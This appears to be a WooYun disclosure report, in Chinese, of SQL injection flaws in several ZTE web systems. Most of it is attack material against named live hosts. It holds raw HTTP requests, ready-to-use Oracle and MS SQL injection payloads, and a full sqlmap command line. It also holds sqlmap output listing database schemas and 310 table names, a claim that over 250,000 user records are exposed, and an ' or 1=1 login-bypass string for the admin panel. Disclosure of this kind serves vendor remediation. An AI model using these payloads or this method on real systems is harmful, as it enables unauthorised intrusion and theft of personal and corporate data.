WooYun.org

站点： http://mts.zte.com.cn 中兴供应商图纸下载管理系统
POST http://mts.zte.com.cn/Mtsmap/CustomerLogin.aspx HTTP/1.1
Host: mts.zte.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://mts.zte.com.cn/Mtsmap/CustomerLogin.aspx
Cookie: ASP.NET_SessionId=akhsqnukmzb3t355ahzmft45
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 234
__EVENTTARGET=c_cmdLogin&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMjEyNDk5Njc4N2RkuzPnWOvmQMT6DJx%2Ffu3eSoFAM7g%3D&__EVENTVALIDATION=%2FwEWBALRva2YCAKKgYHMDwKJsvbvDgLO0aOGAe2ltmsT8z%2BTk0cp8O%2BsqQFUtzBM&c_txtUserPWD=123&c_txtUserPWD=123
c_txtUserPWD参数没有过滤，导致注射漏洞
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: c_txtUserID
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: __EVENTTARGET=c_cmdLogin&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjEyN
Dk5Njc4N2RkuzPnWOvmQMT6DJx/fu3eSoFAM7g=&__EVENTVALIDATION=/wEWBALRva2YCAKKgYHMDw
KJsvbvDgLO0aOGAe2ltmsT8z+Tk0cp8O+sqQFUtzBM&c_txtUserID=123' AND 9008=(SELECT UPP
ER(XMLType(CHR(60)||CHR(58)||CHR(121)||CHR(111)||CHR(105)||CHR(58)||(SELECT (CAS
E WHEN (9008=9008) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(99)||CHR(101)||CH
R(108)||CHR(58)||CHR(62))) FROM DUAL) AND 'kBrd'='kBrd&c_txtUserPWD=123
---
[09:59:54] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
[09:59:54] [INFO] fetching current user
[09:59:54] [INFO] resumed: MTS
current user: 'MTS'
[09:59:54] [INFO] fetching current database
[09:59:54] [INFO] resumed: MTS
current schema (equivalent to database on Oracle): 'MTS'
[09:59:54] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[09:59:54] [INFO] fetching database (schema) names
[09:59:54] [INFO] the SQL query used returns 20 entries
[09:59:54] [INFO] resumed: AMP
[09:59:54] [INFO] resumed: CJQ
[09:59:54] [INFO] resumed: CTXSYS
[09:59:54] [INFO] resumed: DBSNMP
[09:59:54] [INFO] resumed: DMSYS
[09:59:54] [INFO] resumed: EXFSYS
[09:59:54] [INFO] resumed: HR
[09:59:54] [INFO] resumed: HRUSER
[09:59:54] [INFO] resumed: MDSYS
[09:59:54] [INFO] resumed: MTS
[09:59:54] [INFO] resumed: OLAPSYS
[09:59:54] [INFO] resumed: ORDSYS
[09:59:54] [INFO] resumed: OUTLN
[09:59:54] [INFO] resumed: SCOTT
[09:59:54] [INFO] resumed: SYS
[09:59:54] [INFO] resumed: SYSMAN
[09:59:54] [INFO] resumed: SYSTEM
[09:59:54] [INFO] resumed: TSMSYS
[09:59:54] [INFO] resumed: WMSYS
[09:59:54] [INFO] resumed: XDB
available databases [20]:
[*] AMP
[*] CJQ
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] HRUSER
[*] MDSYS
[*] MTS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
300多张表
Database: MTS
[310 tables]
+--------------------------------+
| A |
| AA |
| APP_DEFAULT_PURVIEW |
| APP_SYS_CONFIG |
| APP_SYS_USER |
| AT16 |
| A_STOCK_PD |
| A_STOCK_SUM |
| BATCHCOPY20101111_HUANGTX |
| BA_BOM_DETAIL |
| BA_BOM_HEAD |
| BA_ITEM |
| BA_ITEMBAK |
| BA_ITEMCORP |
| BA_ITEM_0317 |
| BA_ITEM_ATMP |
| BA_ITEM_ATMP2 |
| BA_ITEM_ATMP22 |
| BA_ITEM_ATMP2_BAK |
| BA_ITEM_BAK20111215 |
| BA_ITEM_BRAND |
| BA_ITEM_BRAND_ATMP |
| BA_ITEM_BRAND_ATMP2 |
| BA_ITEM_FIRST_SEL_FILE |
| BA_ITEM_FIRST_SEL_LOG |
| BA_ITEM_FIRST_SEL_MAIN |
| BA_ITEM_SUPPLIER |
| BA_ITEM_SUPPLIER_ATMP |
| BA_ITEM_SUPPLIER_ATMP2 |
| BA_SUPPLIER |
| BA_SUPPLIER_ATMP |
| BA_SWITCH |
| BUSINESS_DLL |
| CODESMITH_EXTENDED_PROPERTIES |
| COM_DEFINE_PKS |
| COM_DEFINE_PROPERTY_DESC |
| COM_DEFINE_PROPERTY_DESC1124 |
| COM_DEPT_LINKMAN |
| COM_ERROR_LOG |
| COM_INTERFACE |
| COM_INTERFACE_DISPATCH |
| COM_INTERFACE_DRAWING |
| COM_INTERFACE_PARAM |
| COM_INTERFACE_RECORD |
| COM_MAT_CLASS |
| HRT_ADMINUNIT_INFO_BAK |
| HRT_EMPLOYEEBASE_INFO |
| HRT_EMPLOYEEBASE_INFO_BAK |
| HRT_EMPLOYEEBASE_INFO_INNER |
| HRT_EMPLOYEEBASE_INFO_XF |
| HUANGTX |
| MICROSOFTDTPROPERTIES |
| MTS_BATCH_VALID |
| MTS_BATCH_VALID_OLD |
| MTS_BIZCONTECT_BILL |
| MTS_BOM_INFO |
| MTS_BOOK_STORE |
| MTS_BORROW_MAP |
| MTS_BORROW_PROJ_RELATION |
| MTS_DEFINE_ADDRINFO |
| MTS_DEFINE_STOCKUNIT |
| MTS_DEFINE_TESTITEM |
| MTS_DEFINE_XCPAUDIT |
| MTS_DEFINE_XCPDEPT |
| MTS_DEFINE_XCPED |
| MTS_DELETE_MATINFO |
| MTS_DETAIL_ACCOUNT |
| MTS_DETAIL_MAILTO_LIST |
| MTS_DETAIL_ORDERBILL |
| MTS_DETAIL_PREZSAPP |
| MTS_DETAIL_STOCKBILL |
| MTS_DETAIL_TESTREPORT |
| MTS_DETAIL_TEST_BR |
| MTS_DETAIL_XCP_ORDERBILL |
| MTS_EXCETIONCUT_BILL |
| MTS_FILES |
| MTS_FTP_CONFIG |
| MTS_FUNDAMOUNT |
| MTS_FUNDAPP |
| MTS_FUNDAPP_BOMTMP |
| MTS_GAME_STORE |
| MTS_HEADER_ACCOUNT |
| MTS_HEADER_MAILTO_LIST |
| MTS_HEADER_ORDERBILL |
| MTS_HEADER_PREZSAPP |
| MTS_HEADER_STOCKBILL |
| MTS_HEADER_TESTREPORT |
| MTS_HEADER_TEST_BR |
| MTS_HEADER_XCP_ORDERBILL |
| MTS_KEYITEM_DETAIL |
| MTS_KEYITEM_HEADER |
| MTS_KEYITEM_SAMPLE_DETAIL |
| MTS_KEYITEM_SAMPLE_HEADER |
| MTS_LICENSE_BILL |
| MTS_LOSECODE |
| MTS_MAIL_LOG |
| MTS_MAP |
| MTS_MAP_DEPRT |
| MTS_MAP_DETAIL |
| MTS_MAP_LOG |
| MTS_MAP_MAINTAIN |
| MTS_MAP_PROVIDER |
| MTS_MAP_SENDMAIL |
| MTS_MATERIAL_TEST |
| MTS_MATIRIAL_STA |
| MTS_MAT_INFO |
| MTS_MAT_INFO_BAK |
| MTS_MAT_INFO_BAK_UPGRADE |
| MTS_MAT_INFO_SYNC_BAK |
| MTS_MAT_INFO_TEMP |
| MTS_MAT_INFO_WRONGNO |
| MTS_MENU |
| MTS_MENU_GROUP |
| MTS_NOBID_DETAIL |
| MTS_NOBID_HEADER |
| MTS_ONHANDQUANTITY |
| MTS_ONHANDQUANTITY_0508 |
| MTS_ONHANDQUANTITY_1 |
| MTS_ORG_DEFINE |
| MTS_PATCH_BILL |
| MTS_PATCH_CONTACT_BILL |
| MTS_PROJECT_STOCKUNIT |
| MTS_PROJ_AMOUNT |
| MTS_PRO_BOM |
| MTS_QI |
| MTS_QI_KX |
| MTS_QI_MT |
| MTS_RELATION_USER |
| MTS_REPEATCODE |
| MTS_RING_STORE |
| MTS_SAMPLE_VALID |
| MTS_SAMPLE_VALID_OLD |
| MTS_SAMPLING_SHEET |
| MTS_SAMPLING_SHEET_1 |
| MTS_SAMPLING_SHEET_OLD |
| MTS_SOFT_BIZCONTECT |
| MTS_SOFT_NOBID_DETAIL |
| MTS_SOFT_NOBID_HEADER |
| MTS_SOFT_ORDER_HEADER |
| MTS_SOFT_PLAN |
| MTS_SOFT_SMALLORDER |
| MTS_SOFT_SUPPLIER |
| MTS_SUPPLIERMAP_DOC |
| MTS_SUPPLIERMAP_DOC_LOG |
| MTS_SUPPLIERMAP_TMPDIRAPP |
| MTS_SUPPLIER_FEEDBACK |
| MTS_SUPPLIER_INFO |
| MTS_TASK |
| MTS_TEMP_20101213 |
| MTS_TEST_APP |
| MTS_TEST_BORROW_INV |
| MTS_VIDEO_STORE |
| MTS_WALLPAPER_STORE |
| MTS_XCP_ED_HISTORY |
| MTS_XCP_FUNDAPP |
| PLAN_TABLE |
| PUB_LOGMANAGE |
| PUB_MAILINFO |
| PUB_MENUMANAGE |
| PUB_PARAMLOG |
| PUB_PROCESSINGQUEUE |
| PUB_QUEUETASK |
| RCS_REQUIREMENT_BASEINFO |
| RCS_REQUIREMENT_DETAIL |
| RCS_REQUIREMENT_DOCLIST |
| RCS_REQUIREMENT_HEADER |
| SOC_AUTH_LOG |
| SOC_RIGHT_DETAIL |
| SP_BA_INSTOCK |
| SP_BA_OUTSTOCK |
| STANDARD_AUTHENTIC_STORE |
| STANDARD_IDENTIFIER_STORE |
| SYN_MATERIAL_TEST |
| SYS_ACCESSPOLICY |
| SYS_CALENDAR |
| SYS_CAREERDEPT |
| SYS_CAREERDEPT_MATRIX |
| SYS_CAREERDEPT_MATRIX_TMP |
| SYS_DEPT |
| SYS_DEPT_TMP |
| SYS_DOMAIN |
| SYS_DOMAINRULE_TMP_GROUP |
| SYS_DOMAINRULE_TMP_ROLE |
| SYS_DOMAIN_BAK |
| SYS_DOMAIN_TMP |
| SYS_GROUP |
| SYS_GROUPREL |
| SYS_GROUPUSER |
| SYS_GROUPUSER_TMP |
| SYS_GROUP_AID |
| SYS_GROUP_TMP |
| SYS_GROUP_TMP_RULE |
| SYS_GROUP_TMP_SEND |
| SYS_HOSTCONFIG |
| SYS_OPERATION_RECORD |
| SYS_ORGANIZATION |
| SYS_ORGROLE |
| SYS_ORG_TMP |
| SYS_OTHERPARAMS |
| SYS_OTHERPARAMS_BAK |
| SYS_PARAMSINFO |
| SYS_POLICYACL |
| SYS_POLICYRULE |
| SYS_RELATION |
| SYS_ROLE |
| SYS_ROLEGROUP |
| SYS_ROLE_COPY |
| SYS_ROLE_TMP |
| SYS_SPANBUSINESS |
| SYS_SPANBUSINESS_TEMP |
| SYS_STORAGECONFIG |
| SYS_TYPE |
| SYS_TYPE_BAK |
| SYS_TYPE_TMP |
| SYS_UNIT |
| SYS_USER |
| SYS_USER_TEST |
| SYS_USER_TMP |
| TASKIDINFO |
| TASKIDINFO_20113 |
| TASKIDINFO_20114 |
| TASKIDINFO_20115 |
| TASKIDINFO_2011_0426 |
| TASKIDINFO_20121 |
| TASKIDINFO_20122 |
| TASKIDINFO_20123 |
| TASKIDINFO_20124 |
| TASKIDINFO_20125 |
| TASKIDINFO_YYC |
| TEMP3DMAP_30785 |
| TEMP3DMAP_30871 |
| TEMP3DMAP_30872 |
| TEMP3DMAP_30873 |
| TEMPMX_30785 |
| TEMPMX_30871 |
| TEMPMX_30872 |
| TEMPMX_30873 |
| TESTHUANG |
| THREAD_ACTION |
| THREAD_ACTION_DEFINE |
| THREAD_CURRENT_STEP |
| THREAD_OUTER_USER |
| THREAD_PROCESS_LOG |
| THREAD_PROCESS_RECORD |
| THREAD_ROLE_DEFINE |
| THREAD_ROLE_USER |
| THREAD_TEMPLATE |
| THREAD_TEMPLATE_DEFINE |
| TMPITEM20050515 |
| TMP_ID_CHANGE |
| TMP_SUPPLIERMAP_DOC_LOG |
| TMP_SUPPLIERMAP_DOC_LOG_DETAIL |
| TMP_TEST_BORROW_INV |
| USR_DELEGATION_INFO |
| USR_GROUPS |
| USR_GROUP_PERMISSION |
| USR_GROUP_USERS |
| USR_INFO |
| USR_INFO_BAK |
| USR_OPERATION_LOG |
| USR_OPERATION_LOG_2 |
| USR_SYS_FUNC |
| WFW_ACTIVETYNODE |
| WFW_ACTIVITY |
| WFW_CONNECTOR |
| WFW_EMAILNODE |
| WFW_ENDNODE |
| WFW_ERROINFO |
| WFW_EXECUTOR |
| WFW_EXECUTORSNAP |
| WFW_FLOWPROCESS |
| WFW_GROUPUSER |
| WFW_LIFECYCLE |
| WFW_LINK |
| WFW_LINKCORD |
| WFW_LINKINSTANCE |
| WFW_LINK_COPY |
| WFW_NODECORD |
| WFW_NODEINSTANCE |
| WFW_NODEPARAMINSTANCE |
| WFW_NODESTATEINSTANCE |
| WFW_PARAMS |
| WFW_PARAMS_CSTOBS |
| WFW_PROCESSPARAMINSTANCE |
| WFW_ROLEGROUP |
| WFW_ROLERIGHT |
| WFW_SCRIPTNODE |
| WFW_SHORTCUTNODE |
| WFW_STARTNODE |
| WFW_STATES |
| WFW_STATUSNODE |
| WFW_TASK |
| WFW_TASKACCREDIT |
| WFW_TASKASSIGN |
| WFW_TASKPARAMINSTANCE |
| WFW_TASK_TEMPLATE |
| WFW_TEMPLATE_DLL |
| WFW_TIMERNODE |
| WFW_TRANSCONDITION |
| WFW_WORKFLOW |
| WF_ROLE_DEFINE |
| WF_ROLE_USER |
| WF_TEMPLATE |
| WF_TEMPLATE_ACTION |
| WF_TEMPLATE_DEFINE |
| WF_THREAD_HEADER |
| WF_THREAD_LOG |
| WF_THREAD_RECORD |
| ZTEACCESSPOLICY |
| ZTE_PDM_SYNCH_HISTORIES |
+--------------------------------+
用户信息泄露25w+

截取一部分

存在万能密码，登录管理后台
http://mts.zte.com.cn/Mtsmap/CustomerLogin.aspx
用户名密码' or 1=1 or ''='

图纸下载

可查看厂商问题反馈和新建反馈单

站点：www.ztewelink.com 深圳市中兴物联科技有限公司
另外一处SQL注入，没跑出库
sqlmap.py -u "http://www.ztewelink.com/Search.aspx?action=CN" --data "keyword=123&%E6%8F%90%E4%BA%A4=" -p "keyword" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: keyword
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: keyword=123'; WAITFOR DELAY '0:0:5';--&??=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: keyword=123' WAITFOR DELAY '0:0:5'--&??=
---
[10:18:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
站点：mobsupport.zte.com.cn 中兴ECC电子协同商务平台.
存在多处目录遍历，厂商整站都检查一下吧。

over